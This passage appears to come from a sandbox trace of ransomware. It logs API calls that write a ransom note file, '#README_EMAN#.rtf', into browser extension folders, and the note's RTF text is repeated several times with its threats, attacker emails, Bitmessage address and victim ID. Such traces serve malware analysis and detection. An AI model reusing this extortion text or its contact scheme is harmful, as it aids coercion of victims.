ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.174] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.175] CloseHandle (hObject=0x2e8) returned 1 [0292.175] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0292.175] GetLastError () returned 0x2 [0292.175] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me 